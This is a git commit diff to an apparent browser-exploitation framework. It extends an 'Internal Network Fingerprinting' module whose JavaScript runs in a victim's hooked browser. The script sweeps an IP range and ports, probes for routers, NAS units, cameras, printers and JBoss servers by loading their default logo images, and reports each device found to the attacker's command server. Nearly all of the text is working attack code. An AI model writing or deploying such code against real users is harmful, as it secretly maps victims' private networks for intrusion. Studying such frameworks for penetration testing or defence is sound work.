Improved the Internal_network_fingerprinting module: now IP range and specific ports can be specified. Also added Jboss signature.

git-svn-id: https://beef.googlecode.com/svn/trunk@979 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-05-19 13:39:21 +00:00
parent 66a90cac76
commit fef2b4fbe8
2 changed files with 77 additions and 42 deletions
--- a/modules/recon/internal_network_fingerprinting/command.js
+++ b/modules/recon/internal_network_fingerprinting/command.js
@@ -1,56 +1,85 @@
 beef.execute(function() {

 	var dom = document.createElement('b');
+    var ips = new Array();
+    ipRange = "<%= @ipRange %>";
+    ports = "<%= @ports %>";
+    if(ports != null){
+     ports = ports.split(',');
+    }
+
+    if(ipRange != null){
+        // ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
+        // (only C class IPs are supported atm)
+        ipBounds = ipRange.split('-');
+        lowerBound = ipBounds[0].split('.')[3];
+        upperBound = ipBounds[1].split('.')[3];
+
+        for(i=lowerBound;i<=upperBound;i++){
+            ipToTest = "http://"+ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+            ips.push(ipToTest);
+        }
+    }else{
+        //use default IPs
+        ips = [
+            'http://192.168.0.1',
+            'http://192.168.0.100',
+            'http://192.168.0.254',
+            'http://192.168.1.1',
+            'http://192.168.1.100',
+            'http://192.168.1.254',
+            'http://10.0.0.1',
+            'http://10.1.1.1',
+            'http://192.168.2.1',
+            'http://192.168.2.254',
+            'http://192.168.100.1',
+            'http://192.168.100.254',
+            'http://192.168.123.1',
+            'http://192.168.123.254',
+            'http://192.168.10.1',
+            'http://192.168.10.254'
+        ];
+    }

-	var ips = [
-		'http://192.168.0.1',
-		'http://192.168.0.100',
-		'http://192.168.0.254',
-		'http://192.168.1.1',
-		'http://192.168.1.100',
-		'http://192.168.1.254',
-		'http://10.0.0.1',
-		'http://10.1.1.1',
-		'http://192.168.2.1',
-		'http://192.168.2.254',
-		'http://192.168.100.1',
-		'http://192.168.100.254',
-		'http://192.168.123.1',
-		'http://192.168.123.254',
-        'http://192.168.10.1'
-	];
 	var urls = new Array(
-	new Array("QNAP NAS",":8080","/ajax_obj/img/running.gif",16,16),
-	new Array("QNAP NAS",":8080","/ajax_obj/images/qnap_logo_w.gif",115,21),
-	new Array("Belkin Router",":80","/images/title_2.gif",321,28),
-	new Array("SMC Networks",":80","/images/logo.gif",133,59),
-	new Array("Linksys NAS",":80","/Admin_top.JPG",750,52),
-	new Array("Linksys NAS",":80","/logo.jpg",194,52),
-	new Array("Linksys Network Camera",":80","/welcome.jpg",146,250),
-	new Array("Linksys Wireless-G Camera",":80","/header.gif",750,97),
-	new Array("Cisco IP Phone",":80","/Images/Logo",120,66),
-	new Array("Snom Phone",":80","/img/snom_logo.png",168,62),
-	new Array("Brother Printer",":80","/pbio/brother.gif",144,52),
-	new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27),
-    new Array("JBoss Application server",":8080","/images/logo.gif",226,105)
+    // in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height"
+	new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16),
+	new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21),
+	new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28),
+	new Array("SMC Networks",":80",false,"/images/logo.gif",133,59),
+	new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52),
+	new Array("Linksys NAS",":80",false,"/logo.jpg",194,52),
+	new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250),
+	new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97),
+	new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66),
+	new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62),
+	new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52),
+	new Array("HP LaserJet",":80",false,"/hp/device/images/logo.gif",42,27),
+    new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105)
 	);
-    //console.log("Array loaded [" + urls + "]");

 	// for each ip
 	for(var i=0; i < ips.length; i++) {
-
 		// for each url
 		for(var u=0; u < urls.length; u++) {
-			var img = new Image;
-            //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
-			img.id = u;
-			img.src = ips[i]+urls[u][1]+urls[u][2];
-			//img.title = ips[i]+urls[u][1];
-			img.onload = function() { if (this.width == urls[this.id][3] && this.height == urls[this.id][4]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
-			dom.appendChild(img);
+            if(!urls[u][2] && ports != null){ // use default port
+                var img = new Image;
+                //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
+                img.id = u;
+                img.src = ips[i]+urls[u][1]+urls[u][3];
+                img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+                dom.appendChild(img);
+            }else{ // iterate to all the specified ports
+                for(p=0;p<ports.length;p++){
+                    var img = new Image;
+                    //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
+                    img.id = u;
+                    img.src = ips[i]+":"+ports[p]+urls[u][3];
+                    img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+                    dom.appendChild(img);
+                }
+            }
 		}
 	}
-	// setTimeout("beef.net.send('<%= @command_url %>', <%= @command_id %>,'device=Failed')", 60000)
-
 });

--- a/modules/recon/internal_network_fingerprinting/module.rb
+++ b/modules/recon/internal_network_fingerprinting/module.rb
@@ -24,9 +24,13 @@ class Internal_network_fingerprinting < BeEF::Core::Command
  def initialize
    super({
      'Name' => 'Internal Network Fingerprinting',
-      'Description' => 'Discover devices and applications in the internal network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)',
+      'Description' => 'Discover devices and applications in the internal network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea). </br>If no IP range or ports are specified, the default device (after a default install) IP/port will be used.</br>Only successfully discovered devices/applications will be shown in the command results.',
      'Category' => 'Recon',
      'Author' => ['bcoles@gmail.com', 'wade', 'antisnatchor'],
+      'Data' => [
+        {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
+        {'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080'}
+      ],
      'File' => __FILE__
    })

@@ -44,6 +48,8 @@ class Internal_network_fingerprinting < BeEF::Core::Command
        'verified_status' =>  VERIFIED_USER_NOTIFY,
        'browser_name' =>     IE
    })
+
+
    
    use_template!
  end